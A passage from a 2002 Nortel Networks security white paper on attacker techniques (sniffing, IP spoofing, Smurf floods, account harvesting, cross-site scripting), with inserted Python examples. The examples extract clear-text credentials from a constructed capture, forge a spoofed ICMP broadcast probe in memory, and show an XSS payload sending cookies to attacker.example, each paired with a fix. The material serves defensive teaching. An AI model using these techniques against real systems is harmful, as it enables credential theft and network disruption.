protection from external attacks, application abuse, viruses, unauthorized access, interception, or manipulation of data en route.

With Nortel Networks Security Solutions, enterprises can protect business critical resources, and confidently and confidentially
use the Internet as an extension of their trusted internal network.

For more information about security products, terms, standards, organizations, legislation, and certification, visit our security
solutions Web site at http://www.nortelnetworks.com/solutions/security/related.html.

Appendix A. Hackers’ tools of the trade
Unauthorized access to network resources is usually the result of improper system configuration and usage flaws. Attackers
can take advantage of weak user authentication and authorization tools, improperly allocated hidden space, privileges shared
among applications, or even sloppy employee habits, such as posting passwords on the side of their computers.

Attackers can obtain illegal access by guessing user names and passwords from a dictionary of common strings, by deriving
passwords by algorithmic means, or by capturing them in transit if they are sent unencrypted. After guessing or intercepting a user
name and associated password, the attacker gains a dangerous level of access to internal resources. How much access depends
on the privileges assigned to the compromised account, naturally. But in reality, the potential for damage depends more on the
hacker’s intent. Often the next step is to use the compromised account to install a back door into the enterprise.

Protocols for remote access to e-mail such as IMAP, POP3, and POP2 use simple user name and password authentication tech-
niques. These protocols can be used to facilitate brute force attacks. In fact, there are published methods that allow attackers to
remotely exploit the services of these protocols.

There are even more sophisticated ways of gaining unauthorized access. Worms can be used to perform system-spoofing attacks
whereby one system component masquerades as another. For example, worms have exploited flaws in the debug option of
sendmail and in .rhosts trust (as used in UNIX), both of which rest on weak authentication. The debug option of sendmail can
be turned off; leaving it on is an example of a usage flaw.

IP spoofing or session hijacking is a complex attack that exploits trust relationships. The attacker assumes the identity of a
trusted host in order to sabotage the security of the target host. As far as the target host knows, it is carrying on a conversation
with a trusted host.

In this assault, the attacker first identifies a trusted host whose identity will be assumed, perhaps by first determining the
“patterns of trust” for the host—that is, the range of IP addresses that the host trusts. The next step is to silence the trusted
host, for example with a TCP SYN flood, so that it cannot respond while the attacker is using its identity.

IP spoofing attacks succeed because it is easy to forge a packet’s source IP address and address-based authentication (trusting a
peer because of its IP address) offers no protection against that. A basic spoofing attack is blind, since replies go to the spoofed
address rather than to the attacker; the attacker gains two-way communication only by also manipulating routing so that traffic
for the spoofed address is delivered to the attacker’s host. IP spoofing is often a first step toward other assaults, such as Denial
of Service (DoS) and flooding attacks, and it also hides the true source of those attacks.

Network sniffers were originally designed to enable network managers to diagnose problems, perform analysis, or improve the
performance of their networks. A sniffer sees all traffic on a network segment that is not switched, such as one connected
through a hub. On a switched segment it sees only traffic addressed to its own port, so an attacker must first redirect traffic
toward the sniffer, for example by ARP cache poisoning or by flooding the switch’s MAC address table, before the same
exposure applies.

Older sniffers read packet headers of the network traffic and focused on identifying low-level packet characteristics such as
source and destination address. However, current sniffers can decode data from packets across all layers of the OSI model.

Attackers can use sniffers to view user information and passwords from packets across public or private networks. By using
sniffers, attackers can obtain valuable information about user names and passwords in particular from applications such as FTP,
telnet, and others that send passwords in the clear. Protocols for remote access to e-mail such as IMAP, POP3, and POP2 use
simple user name and password authentication techniques and are especially susceptible to sniffer attacks.

Since users tend to reuse passwords across multiple applications and platforms, attackers can use the acquired information to
obtain access to various resources on the network, where their confidentiality could be compromised. Moreover, these resources
could also be used as launch pads for other attacks.
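What a sniffer actually yields from the protocols named above is easy to show. The following added example (written for this edit, not taken from the Nortel paper) parses a small, hand-constructed capture of client-to-server TCP payloads, pulls user names and passwords out of FTP, POP3, and IMAP sessions, notes where encrypted variants (IMAPS, POP3S) leave nothing to read, and then flags passwords reused across servers. The addresses, accounts, and passwords are invented for the example.

```python
"""Extract clear-text credentials from captured TCP payloads.

Added example, not from the Nortel white paper. It models what a sniffer on a
hub segment (or an attacker who has redirected traffic on a switched segment)
recovers from FTP, POP3 and IMAP logins. The capture below is constructed by
hand; no real traffic is read.
"""
import re
from collections import defaultdict

# Constructed capture: (client, server, server_port, bytes sent by the client)
CAPTURE = [
    ("10.0.0.5", "10.0.0.20", 110, b"USER alice\r\n"),
    ("10.0.0.5", "10.0.0.20", 110, b"PASS s3cret\r\n"),
    ("10.0.0.7", "10.0.0.21", 21, b"USER ftpadmin\r\n"),
    ("10.0.0.7", "10.0.0.21", 21, b"PASS Winter2002\r\n"),
    ("10.0.0.9", "10.0.0.22", 143, b'a001 LOGIN bob "pa55word"\r\n'),
    ("10.0.0.5", "10.0.0.20", 110, b"STAT\r\n"),
    ("10.0.0.5", "10.0.0.21", 21, b"USER alice\r\nPASS s3cret\r\n"),  # alice reuses her mail password
    ("10.0.0.9", "10.0.0.22", 993, b"\x16\x03\x01\x00\x41"),          # IMAPS: TLS, nothing readable
    ("10.0.0.9", "10.0.0.23", 80, b"GET / HTTP/1.1\r\n\r\n"),         # not a login protocol we parse
]

PLAINTEXT_PORTS = {21: "FTP", 110: "POP3", 143: "IMAP"}
ENCRYPTED_PORTS = {990: "FTPS", 993: "IMAPS", 995: "POP3S"}
# IMAP:  <tag> LOGIN <user> <password>, either argument optionally quoted
IMAP_LOGIN = re.compile(rb'^\S+\s+LOGIN\s+("?)([^"\s]+)\1\s+("?)([^"\s]+)\3', re.IGNORECASE)


def harvest_credentials(capture):
    """Return (list of recovered credentials, count of encrypted segments skipped)."""
    flows = defaultdict(lambda: {"user": None, "password": None})
    found, encrypted = [], 0
    for client, server, port, payload in capture:
        if port in ENCRYPTED_PORTS:
            encrypted += 1
            continue
        proto = PLAINTEXT_PORTS.get(port)
        if proto is None:
            continue
        state = flows[(client, server, port)]
        for line in payload.split(b"\r\n"):
            if not line:
                continue
            if proto in ("FTP", "POP3"):
                # Both protocols use the same two commands, sent in the clear.
                cmd, _, arg = line.partition(b" ")
                if cmd.upper() == b"USER":
                    state["user"] = arg.decode(errors="replace")
                elif cmd.upper() == b"PASS":
                    state["password"] = arg.decode(errors="replace")
            else:  # IMAP
                m = IMAP_LOGIN.match(line)
                if m:
                    state["user"] = m.group(2).decode(errors="replace")
                    state["password"] = m.group(4).decode(errors="replace")
            if state["user"] and state["password"]:
                found.append({"proto": proto, "client": client, "server": server,
                              "user": state["user"], "password": state["password"]})
                state["user"] = state["password"] = None  # ready for a re-login on the same flow
    return found, encrypted


def reused_passwords(creds):
    """Passwords seen for more than one (server, user) pair: the reuse the text warns about."""
    seen = defaultdict(set)
    for c in creds:
        seen[c["password"]].add((c["server"], c["user"]))
    return {pw for pw, where in seen.items() if len(where) > 1}


if __name__ == "__main__":
    creds, skipped = harvest_credentials(CAPTURE)
    for c in creds:
        print(f'{c["proto"]:5} {c["client"]} -> {c["server"]}  {c["user"]} / {c["password"]}')
    print(f"encrypted segments skipped: {skipped}; reused passwords: {reused_passwords(creds)}")
```

The parser only needs the direction and port of each segment; it never touches the server's side of the conversation, which is exactly why passive eavesdropping is so hard to detect. The IMAPS segment produces nothing, which is the argument for moving these protocols onto TLS or behind an IP-VPN.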

In general, attackers can use network sniffers by compromising the physical security of the corporation—say, walking into
the office and plugging a laptop into the network. With the growing use of wireless networks, someone in the parking lot with
a wireless device can access the enterprise’s local network. Gaining access to the core packet network enables the attacker to
determine configurations and modes of operation for further exploitation.

Denial of Service (DoS) attacks flood a network with illegitimate requests and thereby prevent legitimate users from accessing
their service. DoS attacks are easy to implement and can cause significant damage, disrupting the operation of the enterprise
and effectively disconnecting it from the rest of the world.

DoS attacks can take various forms and target a variety of services. DoS attacks focus on exhausting network, server, host, and
application resources and on disrupting network connectivity. For example, the SYN flooding attack uses bogus half-open TCP
connection requests that exhaust the connection table or memory of the targeted resource. These types of attacks can prevent
legitimate users from accessing hosts, Web applications, and other network resources. Distributed DoS attacks use the resources
of more than one machine to launch synchronized DoS attacks on a resource.

DoS attacks exploit weaknesses in the architecture of the system under attack. In some cases they exploit weaknesses in
common Internet protocols, such as the Internet Control Message Protocol (ICMP). For example, some DoS attacks send a large
number of ICMP echo (ping) packets to an IP broadcast address with the source address spoofed to that of the intended target;
every host on the broadcast segment replies to the target, and the amplified stream of replies can cripple it. These are called
Smurf attacks. A variant known as the Fraggle attack uses UDP packets but works on the same concept. Both depend on
routers forwarding directed broadcasts, which is why disabling directed-broadcast forwarding at the network edge, together
with filtering packets whose source address does not belong to the network they leave, is the standard countermeasure.
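Both the spoofing attack described earlier and the Smurf attack above rest on one fact: nothing in an IPv4 header binds the source address to the host that sent it. The following added example (written for this edit, not from the Nortel paper) builds, in memory only, the single probe a Smurf attacker would send, an ICMP echo request from the victim's address to a directed-broadcast address, verifies with an independent parser that its checksums are valid and therefore indistinguishable from a genuine packet, and then applies the egress check of RFC 2827 that would have dropped it. Nothing is transmitted (sending would need a raw socket and administrative privilege); the addresses are from the documentation ranges and the packet identifiers are arbitrary.

```python
"""Forge an IPv4/ICMP echo request with a spoofed source address.

Added example, not from the Nortel white paper. It shows why IP spoofing and
Smurf attacks work (a forged header with a correct checksum is a valid
packet) and what the RFC 2827 egress filter does about it. The packet is
built and parsed in memory only; nothing is sent.
"""
import ipaddress
import struct

IPPROTO_ICMP = 1
ICMP_ECHO_REQUEST = 8


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words (odd length is zero-padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp_echo(ident: int, seq: int, payload: bytes = b"smurf") -> bytes:
    """ICMP echo request: type 8, code 0, checksum over header + payload."""
    header = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq)
    csum = inet_checksum(header + payload)
    return struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, csum, ident, seq) + payload


def build_ipv4(src: str, dst: str, proto: int, payload: bytes, ttl: int = 64) -> bytes:
    """Minimal 20-byte IPv4 header. `src` is whatever the caller says: that is the whole point."""
    total_len = 20 + len(payload)
    hdr = struct.pack("!BBHHHBBH4s4s",
                      0x45, 0, total_len,        # version 4, IHL 5, TOS, total length
                      0x1234, 0,                 # identification (arbitrary), flags/fragment offset
                      ttl, proto, 0,             # TTL, protocol, checksum placeholder
                      ipaddress.IPv4Address(src).packed,
                      ipaddress.IPv4Address(dst).packed)
    csum = inet_checksum(hdr)
    return hdr[:10] + struct.pack("!H", csum) + hdr[12:] + payload


def build_smurf_probe(victim: str, directed_broadcast: str) -> bytes:
    """One amplifier probe: an echo request *from* the victim *to* a directed broadcast.
    Every host that answers sends its reply to the victim, not to the attacker."""
    return build_ipv4(victim, directed_broadcast, IPPROTO_ICMP, build_icmp_echo(0xBEEF, 1))


def parse_ipv4(packet: bytes) -> dict:
    """Independent decode of the header, including checksum verification."""
    fields = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    ihl = (fields[0] & 0x0F) * 4
    proto = fields[6]
    info = {
        "src": str(ipaddress.IPv4Address(fields[8])),
        "dst": str(ipaddress.IPv4Address(fields[9])),
        "proto": proto,
        "total_len": fields[2],
        "checksum_ok": inet_checksum(packet[:ihl]) == 0,   # a valid header sums to zero
    }
    if proto == IPPROTO_ICMP and len(packet) > ihl:
        info["icmp_type"] = packet[ihl]
        info["icmp_checksum_ok"] = inet_checksum(packet[ihl:]) == 0
    return info


def egress_filter_drops(packet: bytes, local_net: str) -> bool:
    """RFC 2827 check at the network edge: a packet leaving `local_net` must carry a
    source address inside it. True means the router should drop the packet."""
    src = ipaddress.IPv4Address(parse_ipv4(packet)["src"])
    return src not in ipaddress.IPv4Network(local_net)


if __name__ == "__main__":
    probe = build_smurf_probe("192.0.2.10", "198.51.100.255")
    print(parse_ipv4(probe))
    print("dropped by egress filter on 203.0.113.0/24:",
          egress_filter_drops(probe, "203.0.113.0/24"))
```

The parser's view of the forged packet is the same view the hosts on the broadcast segment get: a well-formed request from 192.0.2.10, which they dutifully answer. Only a check that relates the source address to the interface the packet arrived on (the egress filter above, or unicast reverse-path forwarding on the router) can tell the difference, and only a router that refuses to forward directed broadcasts removes the amplification.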

Bucket brigade attacks are also known as “man-in-the-middle” attacks. In this kind of assault the attacker intercepts the
messages of a public key exchange between a server and a client and retransmits them, substituting the attacker’s own public
key for the requested one. The original parties believe they are communicating directly with each other, while the attacker can
read, and may modify, everything that passes. A sniffer alone is passive; to substitute keys the attacker must also be positioned
to intercept and forward traffic, for example by ARP cache poisoning on the LAN. Authenticating public keys (through
certificates issued by a trusted authority, or out-of-band verification of key fingerprints) is what defeats the substitution.

Back door entries to access network resources can be accidentally or intentionally opened by users and procedural oversights,
such as these:

• Deliberately placed by system developers to allow quick access during development and not turned off upon delivery
• Placed by employees to facilitate performance of their duties
• Part of standard operating system installs that have not been eliminated by “OS hardening,” such as retaining default
user logon ID and password combinations
• Placed by disgruntled employees to allow access after termination
• Created by the execution of malicious code, such as viruses

Masquerading or elevation of privilege enables a hacker to pose as a valid administrator or engineer to access the network.
Masquerading as a user with administrative privileges, the intruder can modify accounts, configuration data, network signaling,
and billing and usage data.

Eavesdropping takes advantage of the “promiscuous mode” of off-the-shelf Ethernet adapters. This mode lets an attacker
capture every packet that reaches the adapter, and so listen to and record data communications on the enterprise LAN.
There are plenty of free network sniffers on the Web today that an attacker can use for eavesdropping. Eavesdropping is an
insidious problem because, being entirely passive, it is difficult to detect.

Appendix B. Application and network level threats
Application threats
Application-layer attacks exploit vulnerabilities in the operating system and applications to gain access to resources.
For example, since Web hosts are accessible by the public on well-known port numbers specified by their protocols (such as
port 80 for HTTP traffic), hackers can launch attacks over the very ports a firewall must leave open, and so bypass it.

Improper configuration and authorization can lead to security holes. For example, a Web server host should freely distribute
Web pages but restrict shell command access to authorized administrators as specified in the security policy.

Account harvesting targets the authentication process when an application requests the user’s logon ID and password.
Applications that generate different error messages for wrong user logon ID and wrong password are vulnerable to this type
of attack. Based on the type of error message, an intruder can customize an attack that first determines a valid user logon ID
and then uses other forms of password cracking techniques to get the password.
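The following added example (written for this edit, not from the Nortel paper) puts the two behaviours side by side: a login routine that answers differently for an unknown user and for a wrong password, the harvesting loop an attacker runs against it, and a corrected routine that returns one message and does the same amount of work on both paths so that neither the text nor the response time reveals which user names exist. The user store, passwords, salt, and hashing parameters are invented for the example.

```python
"""Account harvesting through differential login errors, and the fix.

Added example, not from the Nortel white paper. `login_leaky` tells an
attacker whether a user name exists; `login_uniform` does not, in either its
message or its timing. All accounts and secrets below are made up.
"""
import hashlib
import hmac
import os

ITERATIONS = 100_000  # PBKDF2 work factor; chosen for the demo, tune for production


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


# Constructed user store: name -> (salt, PBKDF2 hash). One shared salt keeps the demo short;
# a real store uses a random salt per account.
_SALT = os.urandom(16)
USERS = {
    "alice": (_SALT, hash_password("correct horse", _SALT)),
    "bob": (_SALT, hash_password("battery staple", _SALT)),
}
# Dummy record consulted for unknown users so that the unknown-user path costs the same.
_DUMMY = (_SALT, hash_password(os.urandom(16).hex(), _SALT))


def login_leaky(username: str, password: str) -> str:
    """Vulnerable: the error message (and the skipped hash) both reveal whether the user exists."""
    if username not in USERS:
        return "Unknown user name"            # tells the attacker the account does not exist
    salt, stored = USERS[username]
    if hash_password(password, salt) != stored:
        return "Incorrect password"           # tells the attacker the account does exist
    return "OK"


def login_uniform(username: str, password: str) -> str:
    """Fixed: one message for every failure, and the hash is always computed and compared."""
    salt, stored = USERS.get(username, _DUMMY)
    matched = hmac.compare_digest(hash_password(password, salt), stored)
    if matched and username in USERS:
        return "OK"
    return "Invalid user name or password"


def harvest(login, candidates):
    """The attacker's loop: probe each name with a junk password and keep every name whose
    response differs from the response for a user that certainly does not exist."""
    baseline = login("no-such-user-zzz", "x")
    return [name for name in candidates if login(name, "x") != baseline]


if __name__ == "__main__":
    names = ["alice", "carol", "bob", "dave"]
    print("leaky login leaks:  ", harvest(login_leaky, names))
    print("uniform login leaks:", harvest(login_uniform, names))
```

The uniform version still has to log the failed attempt with the submitted user name so that operators can see a harvesting run in progress; the point is that the attacker learns nothing from the response. Rate limiting and lockout are complementary, but lockout by itself turns harvesting into a denial of service against the accounts the attacker names.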

Application-layer attacks can be based on viruses, worms, buffer overflows, and password harvesting, among others. Some
application-layer attacks are aimed simply at defacing or taking down the Web site. Others tamper with a Web site’s cookies
(cookie poisoning) to impersonate a user or to extract information the server would not otherwise release. Applications that
trust cookie contents without validating them on the server side can be manipulated in this way, and known vulnerabilities in
current Web browsers allow such cookie-based attacks.

An attacker may also use a cross-site scripting technique to insert malicious code in the form of a script tag that is added to
a URL and executed in the browser of an unsuspecting user who clicks on the URL. SSL can solve some application-layer
security problems but does not fully protect Web applications: it encrypts the channel, not the content, so attacks such as
account harvesting, password cracking, and cross-site scripting can still be launched even if SSL is used.
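The reflected cross-site scripting case above, as an added example written for this edit (not code from the Nortel paper): a search page that echoes its `q` parameter back into the HTML. The vulnerable version pastes the raw value into the page, so a crafted link runs the attacker's script in the victim's browser; the fixed version HTML-escapes the value before it is rendered. The page layout, the parameter name, and the attacker's host name are invented for the example.

```python
"""Reflected cross-site scripting through a URL parameter, and the fix.

Added example, not from the Nortel white paper. Only the rendering step
differs between the two handlers: raw insertion versus HTML escaping.
"""
import html
import re
from urllib.parse import parse_qs, urlsplit

# A crafted link, as it would be mailed or posted to the victim. Decoded, q is:
#   <script>document.location='https://attacker.example/?c='+document.cookie</script>
ATTACK_URL = ("https://www.example.com/search?q=%3Cscript%3Edocument.location%3D%27"
              "https%3A%2F%2Fattacker.example%2F%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E")

# Crude detector used only by this demo: an unescaped opening <script tag in the page.
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def query_param(url: str, name: str) -> str:
    """First value of `name` in the URL's query string, percent-decoded."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_search_vulnerable(url: str) -> str:
    q = query_param(url, "q")
    # Raw reflection: whatever the attacker put in the link becomes markup in the victim's page.
    return f"<html><body><p>Results for: {q}</p></body></html>"


def render_search_fixed(url: str) -> str:
    q = query_param(url, "q")
    # html.escape turns < > & " ' into entities, so the browser displays text instead of parsing tags.
    return f"<html><body><p>Results for: {html.escape(q, quote=True)}</p></body></html>"


def contains_live_script(page: str) -> bool:
    return SCRIPT_TAG.search(page) is not None


if __name__ == "__main__":
    print("vulnerable:", render_search_vulnerable(ATTACK_URL))
    print("fixed:     ", render_search_fixed(ATTACK_URL))
```

Escaping with `quote=True` is correct for text content and for quoted attribute values. Values placed inside a script block, a URL, or a style attribute need context-specific encoding instead, which is why template engines that escape by default are preferable to hand-built responses like the one above. Note that SSL on the search page changes none of this: the script arrives inside a legitimately encrypted response.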

Network threats
Internet-connected enterprises expose their network infrastructure to serious security threats such as sabotage, vandalism, bad
system configuration, denial of service (DoS), snooping, industrial espionage, and theft of service. Attacks may be launched
from inside the network by insiders and also from external sources such as hackers.

Recent developments in hacker technology—such as port scanners that run on mobile terminals—demonstrate that attacks on
network infrastructure can originate from a mobile terminal as well. How do you protect switches, routers, remote access
servers, wireless access points, hosts, and other resources from these threats?

The typical IP packet infrastructure demonstrates a wide array of vulnerabilities:

• It commonly uses protocols with known security vulnerabilities, such as ICMP, TELNET, SNMPv1 and v2, DHCP,
TFTP, RIPv1, NTP, DNS, and HTTP. Other common protocols (e.g., FTP, IMAP, SMTP) may also have vulnerabilities.
• It uses weak, locally managed, static passwords based on short, common dictionary words that are easy to guess.
Some administrators may use one password across network elements, which may be shared and would be known
by all administrators.
• It leaves security information unprotected—for instance—by not encrypting password files, improperly setting firewall
rules, or using weak encryption methods for transmitting passwords.
• It accepts unauthenticated software loads and configuration files, which may be accidentally or maliciously incorrect, resulting
in erroneous device configurations, poor performance, loss of service, and open invitations for Trojan horses or other
malicious code.
• It uses “non-hardened” network elements and operating systems that still use factory default settings, which may run
unnecessary services and have default accounts and passwords still enabled.
• It unnecessarily exposes management ports and interfaces to the public network, or allows unauthorized management
actions over dial-up, ISDN, or other connections.
In the United States:
Nortel Networks
35 Davis Drive
Research Triangle Park, NC 27709
USA

In Canada:
Nortel Networks
8200 Dixie Road, Suite 100
Brampton, Ontario L6T 5P6
Canada

In Caribbean and Latin America:
Nortel Networks
1500 Concorde Terrace
Sunrise, FL 33323
USA

In Europe:
Nortel Networks
Maidenhead Office Park
Westacott Way
Maidenhead Berkshire SL6 3QH
UK

In Asia:
Nortel Networks Asia
6/F Cityplaza 4, Taikooshing
12 Taikoo Wan Road
Hong Kong

Nortel Networks is an industry leader and innovator focused on transforming how the world communicates and exchanges
information. The company is supplying its service provider and enterprise customers with communications technology and
infrastructure to enable value-added IP data, voice and multimedia services spanning Metro and Enterprise Networks, Wireless
Networks, and Optical Long Haul Networks. As a global company, Nortel Networks does business in more than 150 countries.
More information about Nortel Networks can be found on the web at: www.nortelnetworks.com/security

For more information, contact your Nortel Networks representative, or call 1-800-4 NORTEL or 1-800-466-7835 from
anywhere in North America.

*Nortel Networks, the Nortel Networks logo, and the globemark design are trademarks of Nortel Networks.
All other trademarks are the property of their owners.

Copyright © 2002 Nortel Networks. All rights reserved. Information in this document is subject to change without notice.
Nortel Networks assumes no responsibility for any errors that may appear in this document.

NN102060-0902